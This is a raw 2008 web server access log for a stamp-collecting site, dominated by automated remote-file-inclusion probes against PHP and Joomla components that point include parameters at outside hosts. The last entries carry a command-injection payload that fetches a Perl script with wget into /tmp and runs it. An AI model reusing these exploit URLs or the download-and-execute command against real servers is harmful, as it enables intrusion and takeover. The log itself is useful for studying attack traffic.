207.44.132.63 - - [15/Jun/2008:17:00:00 -0700] "GET /scanhttp://www.geocities.com/anna.risma/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
207.44.132.63 - - [15/Jun/2008:17:00:05 -0700] "GET /logs/scanhttp://www.geocities.com/anna.risma/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
212.227.251.172 - - [15/Jun/2008:17:01:28 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.234.213.218 - - [15/Jun/2008:17:01:37 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.213.218 - - [15/Jun/2008:17:01:39 -0700] "GET /logs/access_080519.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.66.242 - - [15/Jun/2008:17:01:39 -0700] "GET /logs/access_080519.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.66.242 - - [15/Jun/2008:17:01:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
91.121.204.165 - - [15/Jun/2008:17:01:45 -0700] "GET /logs//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.121.204.165 - - [15/Jun/2008:17:01:45 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:17:02:01 -0700] "GET /logs/access.log HTTP/1.1" 200 2056 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
205.234.213.218 - - [15/Jun/2008:17:02:12 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.66.242 - - [15/Jun/2008:17:02:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:39 -0700] "GET /logs/access_080407.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:40 -0700] "GET /logs/access_080407.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:40 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:02:40 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:02:58 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
67.195.52.108 - - [15/Jun/2008:17:03:42 -0700] "GET /logs/access_080114.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:03:43 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:03:43 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:03:44 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:03:48 -0700] "GET /logs/access_080526.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:03:49 -0700] "GET /logs/access_080526.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.52.66.242 - - [15/Jun/2008:17:03:57 -0700] "GET /logs//intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.52.66.242 - - [15/Jun/2008:17:03:57 -0700] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
205.234.213.218 - - [15/Jun/2008:17:04:27 -0700] "GET /logs//intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.213.218 - - [15/Jun/2008:17:04:28 -0700] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:05:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /logs/access_080310.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /logs/access_080310.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:07:23 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:08:01 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:08:01 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:08:01 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:08:11 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:08:11 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:08:11 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:35 -0700] "GET /logs/access_080526.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:35 -0700] "GET /logs/access_080526.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:36 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:08:36 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:08:55 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:09:40 -0700] "GET /logs/access_080407.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:09:44 -0700] "GET /logs/access_080407.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.172.168.98 - - [15/Jun/2008:17:09:46 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:10:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.80.245.245 - - [15/Jun/2008:17:10:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:11:25 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:11:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:11:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:11:33 -0700] "GET /logs/access_080526.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.55.68.38 - - [15/Jun/2008:17:12:49 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.194.71.79 - - [15/Jun/2008:17:13:09 -0700] "GET /logs//administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
82.194.71.79 - - [15/Jun/2008:17:13:10 -0700] "GET //administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:17:16 -0700] "GET /logs/access_080512.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:17:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:17:17 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.130.79.73 - - [15/Jun/2008:17:17:47 -0700] "GET /logs//intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.130.79.73 - - [15/Jun/2008:17:17:47 -0700] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:23:16 -0700] "GET /logs/access_080519.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:23:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:23:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:24:33 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:17:33:15 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.40.126.43 - - [15/Jun/2008:17:34:46 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.mathstamps.com"
80.40.126.43 - - [15/Jun/2008:17:34:46 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.mathstamps.com"
202.181.105.117 - - [15/Jun/2008:17:36:38 -0700] "GET /logs/access_080526.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:17:38:11 -0700] "GET /logs/access_080519.log/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:17:38:11 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.154.38.121 - - [15/Jun/2008:17:38:19 -0700] "GET /convert/mvcw.php?vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.154.38.121 - - [15/Jun/2008:17:38:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.57.154.47 - - [15/Jun/2008:17:41:55 -0700] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
69.57.154.47 - - [15/Jun/2008:17:41:55 -0700] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:17:43:07 -0700] "GET /logs/access_080602.log/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:17:43:08 -0700] "GET /index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:17:43:08 -0700] "GET /logs/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.154.38.121 - - [15/Jun/2008:17:43:11 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:17:43:21 -0700] "GET /logs/access_080526.log/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:17:47:06 -0700] "GET /logs/access_071022.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
74.86.129.164 - - [15/Jun/2008:17:48:23 -0700] "GET /logs/access_080317.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.86.129.164 - - [15/Jun/2008:17:48:28 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:17:58:26 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:17:58:26 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:17:58:26 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:17:58:30 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
87.230.27.160 - - [15/Jun/2008:18:00:36 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:18:00:51 -0700] "GET /logs/access_080526.log/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:18:00:52 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:18:00:52 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.219.170.56 - - [15/Jun/2008:18:01:35 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.6.169 - - [15/Jun/2008:18:01:48 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
213.239.213.41 - - [15/Jun/2008:18:01:51 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
195.28.69.222 - - [15/Jun/2008:18:01:51 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.53.164 - - [15/Jun/2008:18:01:54 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.61.18 - - [15/Jun/2008:18:01:54 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
